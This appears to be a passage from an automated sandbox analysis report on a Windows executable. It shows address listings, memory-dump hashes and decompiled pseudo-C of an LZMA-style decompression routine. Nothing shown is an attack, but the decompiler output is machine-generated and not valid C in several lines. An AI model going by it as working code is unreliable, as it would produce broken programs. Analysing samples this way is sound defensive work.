                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406992
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063b9
                                                                                                                          0x004063b9
                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000
                                                                                                                          0x00406a6f
                                                                                                                          0x004068bc
                                                                                                                          0x00406843
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406595

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                          • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                                                                                          • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                          • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
